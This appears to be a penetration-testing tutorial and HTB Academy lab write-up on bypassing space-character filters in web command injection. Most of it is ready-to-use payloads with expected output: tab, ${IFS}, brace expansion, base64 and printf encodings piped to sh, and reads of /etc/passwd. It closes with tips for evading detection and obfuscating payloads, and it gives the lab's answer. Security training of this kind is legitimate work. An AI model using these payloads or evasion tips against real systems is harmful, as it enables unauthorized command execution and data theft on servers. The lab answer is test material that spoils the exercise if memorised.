Bypassing Space Filters

🚫➡️✅ Space Evasion: Comprehensive techniques for bypassing space character filters in command injection attacks

Overview

Space characters are commonly blacklisted in input validation filters, especially when the expected input shouldn't contain spaces (like IP addresses). However, there are numerous methods to achieve command separation and argument passing without using actual space characters.

This section demonstrates multiple space bypass techniques using Linux as the primary example, with Windows compatibility notes where applicable.

Focus: Practical space filter evasion methods with hands-on exploitation examples.

---

Bypass Blacklisted Operators

Confirming Newline Works

From our filter identification phase, we discovered that the newline character (\n / %0a) is not blacklisted while other operators are blocked.

Verification Test:

# Test newline operator
ip=127.0.0.1%0a

# Expected result: Normal ping output (✅ Not blocked)
# Confirms newline can be used as injection operator

Response Analysis:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms

Key Finding: Newline character works as injection operator on both Linux and Windows platforms.

---

Space Filter Detection

Testing Space Character

Attempted Payload:

ip=127.0.0.1%0a whoami
# URL encoded: ip=127.0.0.1%0a%20whoami

Response:

Invalid input

Isolated Space Test:

ip=127.0.0.1%0a%20
# Testing just the space character

Result: Invalid input - Confirms space character (%20) is blacklisted.

Understanding Space Filter Logic

Common PHP Implementation:

$blacklist = [';', '&', '|', ' ', '\t', 'sh', 'bash', ...];

foreach ($blacklist as $character) {
    if (strpos($_POST['ip'], $character) !== false) {
        echo "Invalid input";
        exit();
    }
}

Why Spaces Are Filtered:

• Input validation - Expected inputs (IP addresses) shouldn't contain spaces

• Command prevention - Spaces enable argument separation in commands

• Security measure - Reduces attack surface for command injection

---

Space Bypass Techniques

Method 1: Tab Characters

Technique: Replace spaces with tab characters (\t / %09)

Why It Works:

• Both Linux and Windows accept tabs between command arguments

• Commands execute identically with tabs as with spaces

• Tab character often not included in blacklists

Implementation:

# Original (blocked): 127.0.0.1%0a%20whoami
# Tab bypass: 127.0.0.1%0a%09whoami
ip=127.0.0.1%0a%09whoami

Expected Response:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
www-data

Verification: ✅ Successfully bypassed space filter using tab character.

Method 2: Environment Variables ($IFS)

Technique: Use Linux Internal Field Separator environment variable

Understanding $IFS:

• Default value contains space and tab characters

• Automatic expansion replaces ${IFS} with its value

• Universal availability on Unix/Linux systems

Local Testing:

# Verify IFS contains space and tab
kabaneridev@htb[/htb]$ echo "$IFS" | cat -A
 ^I$

# Test command with IFS
kabaneridev@htb[/htb]$ ls${IFS}-la
total 8
drwxr-xr-x 2 kabaneridev kabaneridev 4096 Jul 13 10:30 .
drwxr-xr-x 3 kabaneridev kabaneridev 4096 Jul 13 10:30 ..

Web Application Implementation:

ip=127.0.0.1%0a${IFS}whoami
# URL encoded: ip=127.0.0.1%0a%24%7bIFS%7dwhoami

Expected Response:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
www-data

Verification: ✅ Successfully bypassed space filter using ${IFS}.

Method 3: Bash Brace Expansion

Technique: Use Bash brace expansion feature for automatic spacing

Understanding Brace Expansion:

• Automatic separation - Bash adds spaces between comma-separated values

• No explicit spaces - Command contains no space characters

• Argument processing - Each element becomes separate argument

Local Testing:

# Traditional command with spaces
kabaneridev@htb[/htb]$ ls -la

# Brace expansion equivalent (no spaces)
kabaneridev@htb[/htb]$ {ls,-la}
total 0
drwxr-xr-x 1 21y4d 21y4d   0 Jul 13 07:37 .
drwxr-xr-x 1 21y4d 21y4d   0 Jul 13 13:01 ..

Web Application Implementation:

ip=127.0.0.1%0a{whoami}
# For commands with arguments:
ip=127.0.0.1%0a{ls,-la}

Multi-Argument Example:

# Traditional: ls -la /etc/passwd
# Brace expansion: {ls,-la,/etc/passwd}
ip=127.0.0.1%0a{ls,-la,/etc/passwd}

---

Additional Space Bypass Methods

Method 4: Redirection Operators

Technique: Use input/output redirection for spacing

# Using input redirection
cat</etc/passwd

# Using output redirection  
ls>output.txt
cat<output.txt

# Web application usage
ip=127.0.0.1%0acat</etc/passwd

Method 5: Variable Assignment

Technique: Assign commands to variables without spaces

# Variable assignment without spaces
cmd=whoami;$cmd

# With arguments
cmd="ls -la";$cmd

# Web application usage
ip=127.0.0.1%0acmd=whoami;$cmd

Method 6: Base64 Encoding

Technique: Encode entire command to avoid problematic characters

# Encode command
echo "ls -la" | base64
# Result: bHMgLWxhCg==

# Execute encoded command
echo bHMgLWxhCg== | base64 -d | sh

# Web application usage
ip=127.0.0.1%0aecho${IFS}bHMgLWxhCg==|base64${IFS}-d|sh

Method 7: Hex Encoding

Technique: Use hex encoding with printf

# Create space using printf
printf "\x20"

# Execute command with hex-encoded space
printf "ls\x20-la" | sh

# Web application usage
ip=127.0.0.1%0aprintf${IFS}"ls\x20-la"|sh

Method 8: Alternative Separators

Extended Whitespace Characters:

\t    → %09    → Tab
\n    → %0a    → Newline  
\r    → %0d    → Carriage return
\v    → %0b    → Vertical tab
\f    → %0c    → Form feed

Testing Extended Characters:

# Vertical tab
ip=127.0.0.1%0awhoami%0bls

# Form feed  
ip=127.0.0.1%0awhoami%0cls

# Combined separators
ip=127.0.0.1%0awhoami%09%0als

---

HTB Academy Lab Solution

Challenge Requirements

Task: Execute the command ls -la and find the size of index.php file.

Known Constraints:

• Newline (\n/%0a) injection operator works

• Space characters are blacklisted

• Need to bypass space in ls -la

Solution Approaches

Method 1: Tab Character Bypass

ip=127.0.0.1%0als%09-la

Method 2: IFS Variable Bypass

ip=127.0.0.1%0als${IFS}-la
# URL encoded: ip=127.0.0.1%0als%24%7bIFS%7d-la

Method 3: Brace Expansion Bypass

ip=127.0.0.1%0a{ls,-la}

Expected Output Analysis

Command Output:

PING 127.0.0.1 (127.0.0.1) 56(84) bytes of data.
64 bytes from 127.0.0.1: icmp_seq=1 ttl=64 time=0.074 ms
--- 127.0.0.1 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms

total 20
drwxr-xr-x 2 www-data www-data 4096 Jul 13 10:30 .
drwxr-xr-x 3 www-data www-data 4096 Jul 13 10:30 ..
-rw-r--r-- 1 www-data www-data 1613 Jul 13 10:30 index.php
-rw-r--r-- 1 www-data www-data  842 Jul 13 10:30 style.css

File Size Identification:

• index.php: 1613 bytes

• style.css: 842 bytes

Answer: 1613

---

Advanced Bypass Combinations

Multi-Method Combinations

Combining Techniques:

# IFS + Brace expansion
{echo,${IFS},"Hello World"}

# Tab + Variable assignment
cmd=ls%09-la;$cmd

# Base64 + IFS
echo${IFS}bHMgLWxhCg==|base64${IFS}-d|sh

Platform-Specific Methods

Linux-Specific:

# Process substitution
cat<(ls -la)

# Command substitution with IFS
$(echo${IFS}ls${IFS}-la)

# Here-string
cat<<<"ls -la"

Windows CMD:

# Caret escape character
ls^-la

# Variable expansion
set cmd=ls -la && %cmd%

Windows PowerShell:

# Tick escape
ls`-la

# String expansion
"ls -la" | Invoke-Expression

---

Systematic Testing Methodology

Step-by-Step Approach

Phase 1: Confirm Working Injection

# Verify injection operator works
ip=127.0.0.1%0a
# Result: ✅ Normal ping output

Phase 2: Test Space Alternatives

# Test each bypass method
ip=127.0.0.1%0awhoami%09    # Tab
ip=127.0.0.1%0awhoami${IFS} # IFS
ip=127.0.0.1%0a{whoami}     # Brace expansion

Phase 3: Execute Target Command

# Apply working bypass to target command
ip=127.0.0.1%0a{ls,-la}

Phase 4: Parse Results

# Extract required information from output
# Look for specific files and their sizes

Payload Development Template

Progressive Complexity:

# Level 1: Basic injection
127.0.0.1%0acommand

# Level 2: Single argument
127.0.0.1%0acommand%09arg

# Level 3: Multiple arguments  
127.0.0.1%0a{command,arg1,arg2}

# Level 4: Complex operations
127.0.0.1%0aecho${IFS}payload|base64${IFS}-d|sh

---

Comprehensive Reference Table

Space Bypass Methods Comparison

Method	Syntax	URL Encoded	Platform	Reliability
Tab	\t	%09	Universal	High
IFS Variable	${IFS}	%24%7bIFS%7d	Unix/Linux	High
Brace Expansion	{cmd,arg}	%7bcmd,arg%7d	Bash	Medium
Vertical Tab	\v	%0b	Universal	Medium
Form Feed	\f	%0c	Universal	Low
Base64	echo X|base64 -d|sh	Complex	Unix/Linux	Medium
Hex Encoding	printf "cmd\x20arg"	Complex	Unix/Linux	Medium
Redirection	cat<file	cat%3cfile	Unix/Linux	High

Selection Strategy

Primary Methods (High Success Rate):

1. Tab character (%09) - Universal compatibility

2. IFS variable (${IFS}) - Reliable on Unix/Linux

3. Brace expansion ({cmd,arg}) - Clean syntax

Fallback Methods:

1. Extended whitespace (%0b, %0c) - When primary blocked

2. Encoding methods - When characters are heavily filtered

3. Platform-specific - When environment is known

---

Detection Evasion Tips

Stealth Considerations

Avoid Common Patterns:

• Don't always use the same bypass method

• Vary payload structure between requests

• Mix different techniques in single payload

Blend with Normal Traffic:

• Use realistic command arguments

• Avoid obviously malicious commands

• Time requests to appear natural

Error Handling:

# Graceful degradation
{ls,-la}||{dir,/w}||echo${IFS}"fallback"

Payload Obfuscation

Multi-Layer Encoding:

# Double encoding
echo cHdkCg== | base64 -d | sh

# Mixed methods
{echo,${IFS},cHdkCg==}|base64${IFS}-d|sh

This comprehensive guide to space filter bypasses provides multiple reliable methods for maintaining command injection capabilities even when space characters are blacklisted, ensuring successful exploitation across various filtering scenarios.